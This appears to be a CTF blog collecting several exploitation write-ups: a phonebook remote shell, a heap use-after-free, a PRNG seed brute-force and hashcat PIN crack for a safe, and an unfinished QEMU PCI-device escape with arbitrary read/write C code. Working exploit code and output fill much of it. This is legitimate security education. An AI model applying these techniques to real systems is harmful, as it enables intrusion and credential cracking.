[*] '/home/nasm/Documents/phonebook/chall/phonebook_patched_patched'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'.'
[+] Opening connection to 51.124.222.205 on port 13380: Done
[*] binary: 0x558980fdd000
[*] libc @ 0x7fabfec57000
[*] system @ 0x7fabfeca92c0
[*] Switching to interactive mode
$ id
uid=1337 gid=1337 groups=1337
$ cat flag.txt
DCTF{C4n_1_g3t_y0ur_numb3r?}

[Breizh CTF 2022 - pwn] Faible Ty Reseau

Fri, 04 Mar 2022 00:00:00 GMT

Faible Ty Réseau is a basic heap-like challenge, it allows us to create a configuration, edit it, call a function pointer on it and finally to free it:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  while ( 1 )
  {
    puts(aVousN);
    printf(a1ModifierLesPa, argv);
    fflush(stdout);
    v4 = 0;
    argv = &v4;
    __isoc99_scanf(&unk_21F3, &v4);
    switch ( v4 )
    {
      case 0:
        printf("wtf ?");
        fflush(stdout);
        break;
      case 1:
        create();
        break;
      case 2:
        delete();
        break;
      case 3:
        exec();
        break;
      case 4:
        show();
        break;
      case 5:
        exit(0);
      default:
        continue;
    }
  }
}

They are many ways to pwn the challenge, I did it by taking advantage of the UAF in create:

__int64 create()
{
  int v1; // [rsp+4h] [rbp-1Ch]
  int v2; // [rsp+8h] [rbp-18h]
  void *buf; // [rsp+10h] [rbp-10h]
  void *v4; // [rsp+18h] [rbp-8h]

  if ( !ptr )
  {
    ptr = malloc(0x18uLL);
    byte_4104 = 1;
  }
  buf = calloc(0x19uLL, 1uLL);
  write(1, "New hostname : ", 0x10uLL);
  v1 = read(1, buf, 0x18uLL);
  *(buf + v1) = 0;
  v4 = calloc(0x19uLL, 1uLL);
  printf("\nNew host : ");
  fflush(stdout);
  v2 = read(1, v4, 0x18uLL);
  *(v4 + v2) = 0;
  fflush(stdout);
  if ( byte_4104 != 1 )
  {
    fflush(stdout);
    realloc(ptr, v1 + v2 - 2);
    *ptr = buf;
    *(ptr + 1) = v4;
    *(ptr + 2) = sub_1259;
  }
  byte_4104 = 0;
  *ptr = buf;
  *(ptr + 1) = v4;
  *(ptr + 2) = sub_1259;
  fflush(stdout);
  alloc_admin();
  return 0LL;
}

As we can see, if ptr is not NULL and that we enter only one byte for each read (by sending only \n for example), then we will trigger a realloc(ptr, 1 + 1 - 2) which frees ptr, ptr being freed the freelist is pointing on ptr. Now let's take a look at the alloc_admin function:

__int64 alloc_admin()
{
  char *v1; // [rsp+0h] [rbp-10h]
  char *v2; // [rsp+8h] [rbp-8h]

  fflush(stdout);
  qword_40F8 = malloc(0x18uLL);
  fflush(stdout);
  v1 = malloc(0xAuLL);
  fflush(stdout);
  strcpy(v1, "Admin");
  fflush(stdout);
  v2 = malloc(0xAuLL);
  fflush(stdout);
  strcpy(v2, "000000000");
  fflush(stdout);
  *qword_40F8 = v1;
  *(qword_40F8 + 8) = v2;
  *(qword_40F8 + 16) = win;
  fflush(stdout);
  return 0LL;
}

By allocating 0x18 bytes, it gets the previous freed ptr and writes over a few fields like the function pointer. Then we just have to call the exec function which will call the win function:

int exec()
{
  if ( ptr )
    return (*(ptr + 2))();
  printf("Pas de configuration !");
  return fflush(stdout);
}

Which gives us:

nasm@off:~/ctf/bzhCTF/pwn$ ./FTM
Vous n'êtes pas connecté (anonyme)
1. Modifier les paramètres de connexion
2. Restaurer la configutation d'usine
3. Tester la configuration
4. Voir la configuration courante
5. Quitter (au revoir !)
>>>> 1
New hostname : dumb

New host : dumb
Vous n'êtes pas connecté (anonyme)
1. Modifier les paramètres de connexion
2. Restaurer la configutation d'usine
3. Tester la configuration
4. Voir la configuration courante
5. Quitter (au revoir !)
>>>> 1
New hostname : 

New host : 
Vous n'êtes pas connecté (anonyme)
1. Modifier les paramètres de connexion
2. Restaurer la configutation d'usine
3. Tester la configuration
4. Voir la configuration courante
5. Quitter (au revoir !)
>>>> 3
BZHCTF{9024b719d4449bc9827478e50f0279427ccb542cc3ecdec21fce38c52b29561c}

[TRACS 2021 - RE] Coffre

Sun, 05 Dec 2021 00:00:00 GMT

Intro

Epreuve 12-3 – Coffre En tant que stagiaire vous avez accès aux locaux de la NSB. Vous allez collecter des informations dans les locaux. Un coffre est présent dans les locaux en salle rideau. Il appartient à Richard Cresus de la Tune. Essayez d’ouvrir ce coffre. Quel est l’IBAN contenu dans le coffre ? Format de la réponse : IBAN sans séparateur.

Basically, we have to crack open an electronic safe. It's locked with an electromagnet and requires a pin to open, moreover it prints an id right before asking for the pin. We previously were given a link to the download page one of the safe's software update (http://safe-locks.tracs.viarezo.fr/download).

Reversing the custom libcrypto.so library

The software update comes in the from of a .maj archive that we extracted to get two libcrypto.so libraries (one for x86, the other one for arm64 v7). We checked if the files were equivalent by looking at their code structure, and we finally choose to reverse the x86 library (even though the safe probably used the arm one) because it was easier.

Firstly, we looked at how the pin was checked, more specifically at the libsafe_test_passcode in IDA:

_BOOL8 __fastcall libsafe_test_passcode(const char *a1)
{
  unsigned int v2; // eax
  int fd; // [rsp+1Ch] [rbp-64h]
  char buf[36]; // [rsp+20h] [rbp-60h] BYREF
  char s1[40]; // [rsp+50h] [rbp-30h] BYREF
  unsigned __int64 v6; // [rsp+78h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  fd = open(".safe_db", 0);
  if ( fd < 0 )
    return 0LL;
  read(fd, buf, 0x24uLL);
  close(fd);
  v2 = strlen(a1);
  sha256sum(a1, v2, s1);
  return memcmp(s1, &buf[4], 0x20uLL) == 0;
}

We assume the argument is a pointer to the pin, for which we compute its sha256sum. And if it is equal to buf[4:0x24], it means the pin correct! So we have to understand what buf[4:0x24] is, which is stored in the .safe_db file. To do so we look at the libsafe_generate_new_passcode function:

__int64 __fastcall libsafe_generate_new_passcode(unsigned __int8 *a1)
{
  unsigned int v1; // eax
  int i; // [rsp+18h] [rbp-468h]
  int fd; // [rsp+1Ch] [rbp-464h]
  char file_content[36]; // [rsp+20h] [rbp-460h] BYREF
  char hash_rand_buf[32]; // [rsp+50h] [rbp-430h] BYREF
  char rand_buf[1032]; // [rsp+70h] [rbp-410h] BYREF
  unsigned __int64 canary; // [rsp+478h] [rbp-8h]

  canary = __readfsqword(0x28u);
  v1 = time(0LL);
  srand(v1);
  memset(file_content, 0, sizeof(file_content));
  *(_DWORD *)file_content = rand();
  for ( i = 0; i <= 1023; ++i )
    rand_buf[i] = rand();
  sha256sum(rand_buf, 1024LL, hash_rand_buf);
  _build_passcode((__int64)hash_rand_buf, 32LL, (__int64)a1, 8LL);
  sha256sum(a1, 8LL, &file_content[4]);
  fd = open(".safe_db", 577);
  if ( fd < 0 )
    return 1LL;
  write(fd, file_content, 0x24uLL);
  close(fd);
  return 0LL;
}

The function is very basic:

It takes as argument a pointer to the buffer to cipher for which we compute the hash to fill out the .safe_db file.
It initializes the PRNG with time(NULL) passed as an argument tosrand. It then creates an array of 1024 random bytes with the use of rand.
Then, this array is hashed with sha256sum and its hash is given to the _build_passcode function. The result is stored in the a1 argument.
The argument is hashed again and in the target file we write at file_content[:4] the first rand value and at file_content[4:0x24] the hash of the previous ciphered buffer.

The core of the encryption algorithm is in the build_passcode function:

__int64 __fastcall build_passcode(
        unsigned __int8 *hash_rand_buf,
        unsigned int length_hash,
        unsigned __int8 *out,
        unsigned int opaque_8)
{
  __int64 result; // rax
  unsigned int i; // [rsp+20h] [rbp-10h]
  unsigned int length_base; // [rsp+24h] [rbp-Ch]

  lenght_base = strlen("1234567890ABCD");
  for ( i = 0; ; ++i )
  {
    result = i;
    if ( i >= opaque_8 )
      break;
    out[i] = base[hash_rand_buf[i % length_hash] % length_base];
  }
  return result;
}

That's just basically filling out the out buffer with base[hash_rand_buf[i % length_hash] % lenght_base].

Now we have a good understanding of the encryption algorithm, we can take a look at what exactly the id printed right before the pin input is. The function that generates the id is libsafe_get_userid:

__int64 __fastcall libsafe_get_userid(_DWORD *id)
{
  int fd; // [rsp+1Ch] [rbp-34h]
  int buf[10]; // [rsp+20h] [rbp-30h] BYREF
  unsigned __int64 v4; // [rsp+48h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  fd = open(".safe_db", 0);
  if ( fd < 0 )
    return 1LL;
  read(fd, buf, 0x24uLL);
  close(fd);
  *id = buf[0];
  return 0LL;
}

The function is very basic, it opens the .safe_db file and initializes the id to the first four bytes of the file which is the first value of rand as seen in the previous functions.

Cracking the seed

To recover the pin, we have to know what hash the hash of the pin will be compared to. To do so, we have to recover the random buffer, hash it, give it to the "core" encryption layer and hash what it outputs. That will be the final hash which will be compared to the hash of the pin we send. The main part of the challenge is so to recover the rand values, more specifically the seed given to srand to initialize the PRNG. We know the seed in the program is time(NULL). Which means that this is a timestamp that can be bruteforced in a reasonable amount of time (the 2020 edition of the CTF was cancelled because of COVID so we took as range the date of the software update until today). The bruteforce is very fast because given we know the id which is the value for the first call to rand, we have just to ensure the first value of rand for the seed we bruteforce is equal to the id value.

Which gives:

from tqdm import tqdm
import hashlib
from ctypes import CDLL
libc = CDLL("libc.so.6")

h = lambda x: hashlib.sha256(x).digest()

START_TIME   = 1605052800 # 2020-11-11 12:00:00 AM -> known date for the software update
CURRENT_TIME = 1638633346 # 2021-12-04  3:55:46 PM -> current time
PINCODE      = 0x4b2e2a1c

CHARSET      = b"1234567890ABCD"
CHARLEN      = len(CHARSET)

for t in tqdm(range(CURRENT_TIME - START_TIME)):
    t += START_TIME

    libc.srand(t)
    
    if PINCODE == libc.rand():

        v8 = [libc.rand() & 0xff for _ in range(1024)]
        v8 = h(bytearray(v8))

        v6 = [CHARSET[v8[i % 32] % CHARLEN] for i in range(8)]
        v6 = h(bytearray(v6))

        print(f"Timestamp: {t=}, hash: {v6.hex()}")

And when we found the right seed, we just have to generate, hash, cipher and hash again the right random buffer to get the right hash to which the hash of the pin will be compared to.

$ python3 solve.py 
 94%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████▏       | 31691218/33580546 [01:29<00:05, 351593.81it/s]
Timestamp: t=1636749762, hash: 88c71c0cc0950acfe3835a009f8931cee0f12ab7410538f96d058184a4c90e11
100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 33580546/33580546 [01:34<00:00, 356533.87it/s]

Hashcat + PROFIT

Now we know the final hash to which the hash of the pin is compared to, we can just run a mask attack using hashcat with a mask of 8 hexadecimal characters in uppercase (we tried for every length up to the right size: 8).

$ hashcat -a 3 -m 1400 pincode.hash ?H?H?H?H?H?H?H?H
[skip]
88c71c0cc0950acfe3835a009f8931cee0f12ab7410538f96d058184a4c90e11:4233246D

Session..........: hashcat
Status...........: Cracked
Hash.Type........: SHA2-256
Hash.Target......: 88c71c0cc0950acfe3835a009f8931cee0f12ab7410538f96d0...c90e11
Time.Started.....: Sat Dec  5 16:52:37 2021 (7 mins, 22 secs)
Time.Estimated...: Sat Dec  5 16:59:59 2021 (0 secs)
Guess.Mask.......: ?H?H?H?H?H?H?H?H [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  7884.8 kH/s (7.30ms) @ Accel:256 Loops:64 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 3342925824/4294967296 (77.83%)
Rejected.........: 0/3342925824 (0.00%)
Restore.Point....: 816128/1048576 (77.83%)
Restore.Sub.#1...: Salt:0 Amplifier:0-64 Iteration:0-64
Candidates.#1....: 1234515D -> EBCF585D

The challenge was pretty funny because of the IRL part, and because we solved it together (nasm and Alol).

Authors: nasm and Alol.

Annexes

[Hack.lu 2021 - pwn] Cloudinspect

Sun, 07 Nov 2021 00:00:00 GMT

CloudInspect

CloundInpect was a hypervisor exploitation challenge I did for the Hack.lu event. I didn't succeed to flag it within the 48 hours :(. But anyway I hope this write up will be interesting to read! The related files can be found right here

After Whiterock released it's trading bot cloud with special Stonks Sockets another hedge fund, Castel, comes with some competition. The special feature here is called "cloudinspect".
The flag is located right next to the hypervisor. Go get it!

Vulnerable PCI device

We got several files:

$ ls
build_qemu.sh  diff_chall.txt  flag  initramfs.cpio.gz  qemu-system-x86_64  run_chall.sh  vmlinuz-5.11.0-38-generic

Apparently, according to the diff_chall.txt , the provided qemu binary is patched with some vulnerable code. Let's take a look at the diff file:

diff --git a/hw/misc/cloudinspect.c b/hw/misc/cloudinspect.c
new file mode 100644
index 0000000000..f1c3f84b2a
--- /dev/null
+++ b/hw/misc/cloudinspect.c
@@ -0,0 +1,204 @@
+/*
+ * QEMU cloudinspect intentionally vulnerable PCI device
+ *
+ */
+
+#include "qemu/osdep.h"
+#include "qemu/units.h"
+#include "hw/pci/pci.h"
+#include "hw/hw.h"
+#include "hw/pci/msi.h"
+#include "qom/object.h"
+#include "qemu/module.h"
+#include "qapi/visitor.h"
+#include "sysemu/dma.h"
+
+#define TYPE_PCI_CLOUDINSPECT_DEVICE "cloudinspect"
+typedef struct CloudInspectState CloudInspectState;
+DECLARE_INSTANCE_CHECKER(CloudInspectState, CLOUDINSPECT,
+                         TYPE_PCI_CLOUDINSPECT_DEVICE)
+
+#define DMA_SIZE        4096
+#define CLOUDINSPECT_MMIO_OFFSET_CMD 0x78
+#define CLOUDINSPECT_MMIO_OFFSET_SRC 0x80
+#define CLOUDINSPECT_MMIO_OFFSET_DST 0x88
+#define CLOUDINSPECT_MMIO_OFFSET_CNT 0x90
+#define CLOUDINSPECT_MMIO_OFFSET_TRIGGER 0x98
+
+#define CLOUDINSPECT_VENDORID 0x1337
+#define CLOUDINSPECT_DEVICEID 0x1337
+#define CLOUDINSPECT_REVISION 0xc1
+
+#define CLOUDINSPECT_DMA_GET_VALUE      0x1
+#define CLOUDINSPECT_DMA_PUT_VALUE      0x2
+
+struct CloudInspectState {
+    PCIDevice pdev;
+    MemoryRegion mmio;
+    AddressSpace *as;
+
+    struct dma_state {
+        dma_addr_t src;
+        dma_addr_t dst;
+        dma_addr_t cnt;
+        dma_addr_t cmd;
+    } dma;
+    char dma_buf[DMA_SIZE];
+};
+
+static void cloudinspect_dma_rw(CloudInspectState *cloudinspect, bool write)
+{
+    if (write) {
+        uint64_t dst = cloudinspect->dma.dst;
+        // DMA_DIRECTION_TO_DEVICE: Read from an address space to PCI device
+        dma_memory_read(cloudinspect->as, cloudinspect->dma.src, cloudinspect->dma_buf + dst, cloudinspect->dma.cnt);
+    } else {
+        uint64_t src = cloudinspect->dma.src;
+        // DMA_DIRECTION_FROM_DEVICE: Write to address space from PCI device
+        dma_memory_write(cloudinspect->as, cloudinspect->dma.dst, cloudinspect->dma_buf + src, cloudinspect->dma.cnt);
+    }
+}
+
+static bool cloudinspect_DMA_op(CloudInspectState *cloudinspect, bool write) {
+    switch (cloudinspect->dma.cmd) {
+        case CLOUDINSPECT_DMA_GET_VALUE:
+        case CLOUDINSPECT_DMA_PUT_VALUE:
+            if (cloudinspect->dma.cnt > DMA_SIZE) {
+                return false;
+            }
+            cloudinspect_dma_rw(cloudinspect, write);
+            break;
+        default:
+            return false;
+    }
+
+    return true;
+}
+
+static uint64_t cloudinspect_mmio_read(void *opaque, hwaddr addr, unsigned size)
+{
+    CloudInspectState *cloudinspect = opaque;
+    uint64_t val = ~0ULL;
+
+    switch (addr) {
+    case 0x00:
+        val = 0xc10dc10dc10dc10d;
+        break;
+    case CLOUDINSPECT_MMIO_OFFSET_CMD:
+        val = cloudinspect->dma.cmd;
+        break;
+    case CLOUDINSPECT_MMIO_OFFSET_SRC:
+        val = cloudinspect->dma.src;
+        break;
+    case CLOUDINSPECT_MMIO_OFFSET_DST:
+        val = cloudinspect->dma.dst;
+        break;
+    case CLOUDINSPECT_MMIO_OFFSET_CNT:
+        val = cloudinspect->dma.cnt;
+        break;
+    case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:
+        val = cloudinspect_DMA_op(cloudinspect, false);
+        break;
+    }
+
+    return val;
+}
+
+static void cloudinspect_mmio_write(void *opaque, hwaddr addr, uint64_t val,
+                unsigned size)
+{
+    CloudInspectState *cloudinspect = opaque;
+
+    switch (addr) {
+    case CLOUDINSPECT_MMIO_OFFSET_CMD:
+        cloudinspect->dma.cmd = val;
+        break;
+    case CLOUDINSPECT_MMIO_OFFSET_SRC:
+        cloudinspect->dma.src = val;
+        break;
+    case CLOUDINSPECT_MMIO_OFFSET_DST:
+        cloudinspect->dma.dst = val;
+        break;
+    case CLOUDINSPECT_MMIO_OFFSET_CNT:
+        cloudinspect->dma.cnt = val;
+        break;
+    case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:
+        val = cloudinspect_DMA_op(cloudinspect, true);
+        break;
+    }
+}
+
+static const MemoryRegionOps cloudinspect_mmio_ops = {
+    .read = cloudinspect_mmio_read,
+    .write = cloudinspect_mmio_write,
+    .endianness = DEVICE_NATIVE_ENDIAN,
+    .valid = {
+        .min_access_size = 4,
+        .max_access_size = 8,
+    },
+    .impl = {
+        .min_access_size = 4,
+        .max_access_size = 8,
+    },
+
+};
+
+static void pci_cloudinspect_realize(PCIDevice *pdev, Error **errp)
+{
+    CloudInspectState *cloudinspect = CLOUDINSPECT(pdev);
+    // uint8_t *pci_conf = pdev->config;
+
+    if (msi_init(pdev, 0, 1, true, false, errp)) {
+        return;
+    }
+
+    cloudinspect->as = &address_space_memory;
+    memory_region_init_io(&cloudinspect->mmio, OBJECT(cloudinspect), &cloudinspect_mmio_ops, cloudinspect,
+                    "cloudinspect-mmio", 1 * MiB);
+    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &cloudinspect->mmio);
+}
+
+static void pci_cloudinspect_uninit(PCIDevice *pdev)
+{
+    // CloudInspectState *cloudinspect = CLOUDINSPECT(pdev);
+
+    msi_uninit(pdev);
+}
+
+static void cloudinspect_instance_init(Object *obj)
+{
+    // CloudInspectState *cloudinspect = CLOUDINSPECT(obj);
+}
+
+static void cloudinspect_class_init(ObjectClass *class, void *data)
+{
+    DeviceClass *dc = DEVICE_CLASS(class);
+    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);
+
+    k->realize = pci_cloudinspect_realize;
+    k->exit = pci_cloudinspect_uninit;
+    k->vendor_id = CLOUDINSPECT_VENDORID;
+    k->device_id = CLOUDINSPECT_DEVICEID;
+    k->revision = CLOUDINSPECT_REVISION;
+    k->class_id = PCI_CLASS_OTHERS;
+    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
+}
+
+static void pci_cloudinspect_register_types(void)
+{
+    static InterfaceInfo interfaces[] = {
+        { INTERFACE_CONVENTIONAL_PCI_DEVICE },
+        { },
+    };
+    static const TypeInfo cloudinspect_info = {
+        .name          = TYPE_PCI_CLOUDINSPECT_DEVICE,
+        .parent        = TYPE_PCI_DEVICE,
+        .instance_size = sizeof(CloudInspectState),
+        .instance_init = cloudinspect_instance_init,
+        .class_init    = cloudinspect_class_init,
+        .interfaces = interfaces,
+    };
+
+    type_register_static(&cloudinspect_info);
+}
+type_init(pci_cloudinspect_register_types)
diff --git a/hw/misc/meson.build b/hw/misc/meson.build
index 1cd48e8a0f..5ff263ca2f 100644
--- a/hw/misc/meson.build
+++ b/hw/misc/meson.build
@@ -1,5 +1,6 @@
 softmmu_ss.add(when: 'CONFIG_APPLESMC', if_true: files('applesmc.c'))
 softmmu_ss.add(when: 'CONFIG_EDU', if_true: files('edu.c'))
+softmmu_ss.add(files('cloudinspect.c'))
 softmmu_ss.add(when: 'CONFIG_FW_CFG_DMA', if_true: files('vmcoreinfo.c'))
 softmmu_ss.add(when: 'CONFIG_ISA_DEBUG', if_true: files('debugexit.c'))
 softmmu_ss.add(when: 'CONFIG_ISA_TESTDEV', if_true: files('pc-testdev.c'))

The first thing I did when I saw this was to check out how memory_region_init_io and pci_register_bar functions work. It sounds a bit like like a kernel device which registers a few handlers for basic operations like read / write / ioctl. Very quickly I found two write up from dangokyo this one and this other one, I recommend you to check it out, they are pretty interesting and well written.

PCI stands for Peripheral Component Interconnect, that's a standard that describes the interactions between the cpu and the other physical devices. The PCI device handles the interactions between the system and the physical device. To do so, the PCI handler is providing a physical address space to the kernel, reachable through the kernel abstractions from a particular virtual address space. This address can be used to cache some data, but that's mainly used to request a particular behavior from the kernel to the physical devices. These requests are written at a well defined offset in the PCI address space, that are the I/O registers. And in the same way, the devices are waiting for some values at these locations to trigger a particular behavior. Check out this and this to learn more about PCI devices!

Now we know a bit more about PCI devices, we can see that the patched code is a PCI interface between the linux guest operating system and .. nothing. That's just a vulnerable PCI device which allows us to read and write four I/O registers (CNT, SRC, CMD and DST). According to these registers, we can read and write at an arbitrary location. There is a check about the size we're requesting for read / write operations at a particular offset from the dmabuf base address, but since we control the offset it does not matter.

To write these registers from userland, we need to mmap the right resource file corresponding to the PCI device. Then we just have to read or write the mapped file at an offset corresponding to the the register we want to read / write. Furthermore, the arbitrary read / write primitives provided by the device need to read to / from a memory area from its physical address the data we want to read / write.

The resource file can be found by getting a shell on the machine to take a look at the output of the lspci command.

/ # lspci -v
00:01.0 Class 0601: 8086:7000
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:01.1 Class 0101: 8086:7010
00:02.0 Class 00ff: 1337:1337

The output of the command is structured like this:

Field 1 : 00:02.0 : bus number (00), device number (02) and function (0)
Field 2 : 00ff    : device class
Field 3 : 1337    : vendor ID
Field 4 : 1337    : device ID

According to the source code of the PCI device, the vendor ID and the device ID are 0x1337, the resource file corresponding to the device is so /sys/devices/pci0000:00/0000:00:02.0/resource0.

Device interactions

What we need to interact with the device is to get the physical address of a memory area we control, which would act like a shared buffer between our program and the PCI device. To do so we can mmap a few pages, malloc a buffer or just allocate onto the function's stackframe a large buffer. Given that I was following the thedangokyo's write up, I just retrieved a few functions he was using and especially for the shared buffer.

The function used to get the physical address corresponding to an arbitrary pointer is based on the /proc/self/pagemap pseudo-file, for which you can read the format here. The virt2phys function looks like this:

uint64_t virt2phys(void* p)
{
		uint64_t virt = (uint64_t)p;
		assert((virt & 0xfff) == 0);
		int fd = open("/proc/self/pagemap", O_RDONLY);
		if (fd == -1)
				perror("open");
		uint64_t offset = (virt / 0x1000) * 8;
		// the pagemap associates each mapped page of the virtual address space 
		// with its PTE entry, the entry corresponding to the page is at address / PAGE_SZ
		// and because that's an array of 64 bits entry, to access the right entry, the
		// offset is multiplied per 8. 
		lseek(fd, offset, SEEK_SET);
		uint64_t phys;
		if (read(fd, &phys, 8 ) != 8)
				perror("read");
		assert(phys & (1ULL << 63));
		// asserts the bit IS_PRESENT is set
		phys = (phys & ((1ULL << 54) - 1)) * 0x1000;
		// flips out the status bits, and shifts the physical frame address to 64 bits
		return phys;
}

To interact with the device we can write the code right bellow:

#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdbool.h>

unsigned char* iomem;
unsigned char* dmabuf;
uint64_t dmabuf_phys_addr;
int fd;

#define PATH "/sys/devices/pci0000:00/0000:00:02.0/resource0"

void iowrite(uint64_t addr, uint64_t value)
{
		*((uint64_t*)(iomem + addr)) = value;
}

uint64_t ioread(uint64_t addr)
{
		return *((uint64_t*)(iomem + addr));
}

uint64_t write_dmabuf(uint64_t offt, uint64_t value) {
		*(uint64_t* )dmabuf = value;
		iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);
		iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, offt);
		iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, 8);
		iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, dmabuf_phys_addr);
		iowrite(CLOUDINSPECT_MMIO_OFFSET_TRIGGER, 0x300);
		return 0;
}

uint64_t read_offt(uint64_t offt) {
		iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);
		iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, offt);
		iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, 8);
		iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, dmabuf_phys_addr);
		ioread(CLOUDINSPECT_MMIO_OFFSET_TRIGGER);
		return *(uint64_t* )dmabuf;
}

int main() {
		int fd1 = open(PATH, O_RDWR | O_SYNC);
		if (-1 == fd1) {
				fprintf(stderr, "Cannot open %s\n", PATH);
				return -1;
		} // open resource0 to interact with the device
		
		iomem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd1, 0); // map resource0
		printf("iomem @ %p\n", iomem);
		
		fd = open("/proc/self/pagemap", O_RDONLY);
		if (fd < 0) {
				perror("open");
				exit(1);
		}

		dmabuf = malloc(0x1000);
		memset(dmabuf, '\x00', sizeof(dmabuf));
		if (MAP_FAILED == iomem) {
				return -1;
		}

		mlock(dmabuf, 0x1000); // trigger PAGE_FAULT to acually map the page
		dmabuf_phys_addr = virt2phys(dmabuf); // grab physical address according to pagemap
		printf("DMA buffer (virt) @ %p\n", dmabuf);
		printf("DMA buffer (phys) @ %p\n", (void*)dmabuf_phys_addr);
}

Now we can interact with the device we got two primitive of arbitrary read / write. The read_offt and write_dmabuf functions permit us to read / write a 8 bytes to an arbitrary offset from the dmabuf object address.

Exploitation

I did a lot of things which didn't worked, so let's summarize all my thoughts:

If we leak the object's address, we can write at any location for which we know the base address, for example overwrite GOT pointers (but it will not succeed because of RELRO).
If we take a look at all the memory areas mapped in the qemu process we can see very large memory area in rwx, which means if we can leak its address and if we can redirect RIP, we just have to write and jmp on a shellcode written in this area.
To achieve the leaks, given that the CloudInspectState structure is allocated on the heap, and that we can read / write at an arbitrary offset from the object's address we can:
- Scan heap memory for pointers to the qemu binary to leak the base address of the binary.
- Scan heap memory for pointers to the heap itself (next, prev pointers for freed objects for example), and then compute the object's address.
- Scan heap memory to leak the rwx memory area
- Scan all the memory area we can read to find a leak of the rwx memory area.
To redirect RIP I thought to:
- Overwrite the destructor function pointer in the MemoryRegion structure.
- Write in a writable area a fake MemoryRegionOps structure for which a certain handler points to our shellcode and make CloudInspectState.mmio.ops point to it.

According to the environment, scan the heap memory is not reliable at all. I succeed to leak the rwx memory area, the binary base address, the heap base address from some contiguous objects in the heap. To redirect RIP, for some reason, the destructor is never called, so we have to craft a fake MemoryRegionOps structure. And that's how I read the flag on the disk. But the issue is that remotely, the offset between the heap base and the object is not the same, furthermore, the offset for the rwx memory leak is I guess different as well. So we have to find a different way to leak the object and the rwx memory area.

Leak some memory areas

To see where we can find pointers to the rwx memory area, we can make use of the search command in pwndbg:

pwndbg> vmmap                                                                                                                                                                              
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA                                                                                                                                            
    0x559a884e1000     0x559a88791000 r--p   2b0000 0      /home/nasm/r2s/ctf/2021/hack.lu/pwn/cloudinspect/qemu-system-x86_64                                                                 
    0x559a88791000     0x559a88c5d000 r-xp   4cc000 2b0000 /home/nasm/r2s/ctf/2021/hack.lu/pwn/cloudinspect/qemu-system-x86_64                                                                 
    0x559a88c5d000     0x559a890ff000 r--p   4a2000 77c000 /home/nasm/r2s/ctf/2021/hack.lu/pwn/cloudinspect/qemu-system-x86_64                                                                 
    0x559a89100000     0x559a89262000 r--p   162000 c1e000 /home/nasm/r2s/ctf/2021/hack.lu/pwn/cloudinspect/qemu-system-x86_64                                                                 
    0x559a89262000     0x559a89353000 rw-p    f1000 d80000 /home/nasm/r2s/ctf/2021/hack.lu/pwn/cloudinspect/qemu-system-x86_64                                                                 
    0x559a89353000     0x559a89377000 rw-p    24000 0      [anon_559a89353]                                                                                                                    
    0x559a8a059000     0x559a8b0e7000 rw-p  108e000 0      [heap]                                                                                                                              
    0x7fc5f4000000     0x7fc5f4a37000 rw-p   a37000 0      [anon_7fc5f4000]                                                                                                              
    0x7fc5f4a37000     0x7fc5f8000000 ---p  35c9000 0      [anon_7fc5f4a37]                                                                                                                    
    0x7fc5fbe00000     0x7fc603e00000 rw-p  8000000 0      [anon_7fc5fbe00]                                                                                                                    
    0x7fc603e00000     0x7fc603e01000 ---p     1000 0      [anon_7fc603e00]                                                                                                                    
    0x7fc604000000     0x7fc643fff000 rwxp 3ffff000 0      [anon_7fc604000]                                                                                                                  
    [SKIP]
pwndbg> search -4 0x7fc60400 -w                                                                                                                                                                
[anon_559a89353] 0x559a89359002 0x7fc60400                                                                                                                                                     
[anon_559a89353] 0x559a8935904a 0x7fc60400                                                                                                                                                     
[anon_559a89353] 0x559a89359052 0x1600007fc60400                                                                                                                                               
[anon_559a89353] 0x559a8935905a 0x2d00007fc60400                                                                                                                                               
[anon_559a89353] 0x559a89359062 0xffd300007fc60400                                                                                                                                             
[anon_559a89353] 0x559a89359072 0x7fc60400                                                                                                                                                     
[anon_559a89353] 0x559a89372b2a 0x10100007fc60400                                                                                                                                              
[anon_559a89353] 0x559a89372bb2 0x100000007fc60400                                                                                                                                             
[anon_559a89353] 0x559a89372bba 0xf00000007fc60400                                                                                                                                             
[heap]          0x559a8a2dccf2 0x2d00007fc60400                                                                                                                                                
[heap]          0x559a8a2dccfa 0x7fc60400                                                                                                                                                      
[heap]          0x559a8a2dcd6a 0x7fc60400                                                                                                                                                      
[heap]          0x559a8a2dcefa 0xffd300007fc60400                                                                                                                                              
[heap]          0x559a8a2dcf18 0x7fc60400                                                                                                                                                      
[SKIP]

